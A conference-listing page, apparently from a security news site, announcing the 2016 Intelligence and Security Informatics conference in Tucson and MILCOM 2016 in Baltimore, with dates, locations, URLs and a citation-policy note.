Intelligence and Security Informatics (ISI) is an interdisciplinary research field involving academic researchers in information technologies, computer science, public policy, bioinformatics, medical informatics, and social and behavior studies; local, state, and federal law enforcement and intelligence experts; and information technology industry consultants and practitioners. ISI supports counterterrorism and homeland security's missions of anticipation, prevention, preparedness and response to security events, in physical, cyber, enterprise, and societal spaces. The 2016 conference will be held in Tucson, Arizona. This year, special workshops will provide participants with even more opportunities for information exchange, networking, and cross-domain problem-solving.
Date: September 27 - 30
Location: Tucson, AZ
URL: http://www.isi-conf.org/

MILCOM 2016
MILCOM is the one conference where command, control, and communication challenges are presented and discussed end to end - from research and development through existing solutions to future needs. It offers industry the opportunity to understand the breadth of requirements, the pace of change, and the state of play in a variety of C4I markets serving DoD as well as federal agencies, and multinational entities. Leaders across government, industry, and academia will address their needs, their issues, and their solutions in the rapidly evolving Cyber domain.
Date: November 1 - 3
Location: Baltimore, MD
URL: http://events.afcea.org/milcom16/public/enter.aspx


(ID#:16-11357)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.